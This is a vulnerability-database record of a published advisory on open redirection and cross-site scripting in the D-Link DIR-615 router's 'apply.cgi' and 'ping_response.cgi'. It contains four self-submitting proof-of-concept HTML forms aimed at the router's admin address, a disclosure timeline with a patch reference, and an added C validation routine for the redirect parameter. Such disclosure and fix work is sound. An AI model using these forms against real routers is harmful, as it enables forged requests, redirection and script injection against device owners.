ID
VAR-E-201701-0676
EDB ID
41033
TITLE
D-Link DIR-615 - Multiple Vulnerabilities - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
D-Link DIR-615 - Multiple Vulnerabilities. Webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | d link | model: | dir-615 | scope: | - | version: | - | Trust: 1.6 |
EXPLOIT
# Title: D-Link DIR-615 Multiple Vulnerabilities
# Date: 10-01-2017
# Hardware Version: E3
# Firmware Version: 5.10
# Tested on: Windows 8 64-bit
# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
# Original write-up: https://osandamalith.com/2017/01/04/d-link-dir-615-open-redirection-and-xss/
Overview
--------
The 'apply.cgi' file was vulnerable to open redirection and XSS. Many other CGI files on the router also use this functionality of 'apply.cgi', for example the 'ping_response.cgi' file.
Open Redirection
-----------------
# apply.cgi
<html>
<!-- @OsandaMalith -->
<body>
<form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
<input type="hidden" name="html_response_page" value="https://google.lk" />
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
<img src=x onerror="exploit.submit()"/>
</form>
</body>
</html>
# ping_response.cgi
<html>
<!-- @OsandaMalith -->
<body>
<form action="http://192.168.0.1/ping_response.cgi" method="POST" id="exploit">
<input type="hidden" name="html_response_page" value="https://google.lk" />
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
<input type="hidden" name="ping_ipaddr" value="192.168.0.101" />
<input type="hidden" name="ping" value="Ping" />
<img src=x onerror="exploit.submit()"/>
</form>
</body>
</html>
POST XSS
---------
# apply.cgi
<html>
<!-- @OsandaMalith -->
<body>
<form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
<input type="hidden" name="html_response_page" value="javascript:confirm(/@OsandaMalith/)" />
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
<img src=x onerror="exploit.submit()"/>
</form>
</body>
</html>
# ping_response.cgi
<html>
<!-- @OsandaMalith -->
<body>
<form action="http://192.168.0.1/ping_response.cgi" method="POST" id="exploit">
<input type="hidden" name="html_response_page" value="javascript:confirm(/@OsandaMalith/)" />
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
<input type="hidden" name="ping_ipaddr" value="127.0.0.1" />
<input type="hidden" name="ping" value="Ping" />
<img src=x onerror="exploit.submit()"/>
</form>
</body>
</html>
Disclosure Timeline
--------------------
12/19/16: Reported to D-Link
12/21/16: Security Patch released
ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-615/REVT/DIR-615_REVT_RELEASE_NOTES_20.12PTb01.pdf
Trust: 1.0
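Both issues above come from the 'html_response_page' value being used as a redirect target without validation. The following is an added example, not code from the advisory or from D-Link's firmware, of a server-side check that accepts only a bare local page name. It assumes legitimate values look like 'tools_vct.asp'; the function names, the length limit and the 'index.asp' fallback are hypothetical.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_PAGE_LEN 64  /* assumed upper bound for a local page name */

/* Hypothetical helper: returns 1 if value is a bare local page name
 * such as "tools_vct.asp", 0 otherwise. */
int is_local_response_page(const char *value)
{
    static const char suffix[] = ".asp";
    size_t slen = sizeof(suffix) - 1;
    size_t len, i;

    if (value == NULL)
        return 0;
    len = strlen(value);
    if (len <= slen || len > MAX_PAGE_LEN)
        return 0;
    /* Letters, digits, '_', '-' and '.' only: this excludes ':' and '/',
     * so neither "https://..." nor "javascript:..." can pass. */
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)value[i];
        if (!isalnum(c) && c != '_' && c != '-' && c != '.')
            return 0;
    }
    /* No hidden files and no parent-directory sequences. */
    if (value[0] == '.' || strstr(value, "..") != NULL)
        return 0;
    return strcmp(value + len - slen, suffix) == 0;
}

/* Hypothetical wrapper: the page to redirect to, or a fixed fallback. */
const char *safe_response_page(const char *value, const char *fallback)
{
    return is_local_response_page(value) ? value : fallback;
}

int main(void)
{
    /* Values taken from the proof-of-concept forms above. */
    const char *samples[] = { "tools_vct.asp", "https://google.lk",
                              "javascript:confirm(/@OsandaMalith/)" };
    for (size_t i = 0; i < sizeof(samples) / sizeof(samples[0]); i++)
        printf("%-40s -> %s\n", samples[i],
               safe_response_page(samples[i], "index.asp"));
    return 0;
}
```

The same check applies to 'html_response_return_page' and to every CGI file that shares this redirect handling, such as 'ping_response.cgi'.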
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Multiple Vulnerabilities
Trust: 1.6
CREDITS
Osanda Malith Jayathissa
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 41033 | Trust: 1.6 |
db: | EDBNET | id: | 89953 | Trust: 0.6 |
REFERENCES
url: | https://www.exploit-db.com/exploits/41033/ | Trust: 0.6 |
SOURCES
db: | EXPLOIT-DB | id: | 41033 |
db: | EDBNET | id: | 89953 |
LAST UPDATE DATE
2022-07-27T10:00:43.252000+00:00
SOURCES RELEASE DATE
db: | EXPLOIT-DB | id: | 41033 | date: | 2017-01-10T00:00:00 |
db: | EDBNET | id: | 89953 | date: | 2017-01-12T00:00:00 |